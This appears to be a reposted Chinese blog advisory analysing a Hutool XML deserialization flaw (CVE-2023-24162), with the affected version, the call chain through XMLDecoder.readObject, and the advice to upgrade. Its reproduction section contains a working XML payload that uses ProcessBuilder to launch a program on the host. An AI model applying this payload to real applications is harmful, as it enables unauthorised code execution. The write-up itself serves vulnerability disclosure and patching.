热门标签
热门文章
- 1【极简版】一篇文章理解UGC、PGC、POI运营管理与O2O行业
- 2抓取静态网页数据
- 3免费期刊类表
- 42024最新Keilv5下载安装注册及添加ARM5编译器_mdk540
- 5【Python笔记-FastAPI】后台任务+WebSocket监控进度_fastapi list[websocket]
- 6数学建模大师手册:全国大学生数学建模竞赛模板(附Word模版)_数学建模模板csdn
- 7域内提权之CVE-2020-1472复现打域控_cve-2020-1472下载
- 8Python 3.x 学习:Python 简介、安装(一)_python官网python3.x安装包其中包括什么
- 9BIO、NIO、AIO你会用了吗,java高级技术经理面试题_byte[] bytes =new byte[1]; int value = socket.geti
- 10hadoop—haddop部署、yarn管理器使用、hdfs的高可用、yarn的高可用、Hbase分布式部署_哈道普分布式部署安装是什么原理
当前位置: article > 正文
漏洞分析|hutool XML反序列化漏洞(CVE-2023-24162)_hutool漏洞
作者:从前慢现在也慢 | 2024-07-15 04:34:36
赞
踩
hutool漏洞
1.漏洞描述
Hutool是一个小而全的Java工具类库,通过静态方法封装,降低相关API的学习成本,提高工作效率。
Hutool 中的XmlUtil.readObjectFromXml方法直接封装调用XMLDecoder.readObject解析xml数据,当使用 readObjectFromXml 去处理恶意的 XML 字符串时会造成任意代码执行。
2.影响版本
Hutool v5.8.11
3.漏洞复现
- XmlUtil.readObjectFromXml("<java>\n" +
- " <object class=\"java.lang.ProcessBuilder\">\n" +
- " <array class=\"java.lang.String\" length=\"1\">\n" +
- " <void index=\"0\">\n" +
- " <string>calc</string>\n" +
- " </void>\n" +
- " </array>\n" +
- " <void method=\"start\"></void>\n" +
- " </object>\n" +
- "</java>\n");
4.漏洞分析
在最新版的 hutool-all 没有用黑名单,而是直接移除了 readObjectFromXml 方法
cn.hutool.core.util.XmlUtil#readObjectFromXml(java.lang.String)
当然这个地方也是可以通过读取文件来实现的
cn.hutool.core.util.XmlUtil#readObjectFromXml(java.io.File)
cn.hutool.core.util.XmlUtil#readObjectFromXml(org.xml.sax.InputSource)
java.beans.XMLDecoder#readObject
漏洞本质上是 java 原生方法中的漏洞,XMLDecoder.readObject 。所以不去调用 hutool-all 中的 readObjectFromXml 方法 就可以避免这个漏洞的产生。
5.修复建议
修复方式
官方已发布补丁,升级到最新版本即可
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2023-24162
https://gitee.com/dromara/hutool/issues/I6AEX2
本文内容由网友自发贡献,转载请注明出处:https://www.wpsshop.cn/w/从前慢现在也慢/article/detail/827732
推荐阅读
相关标签
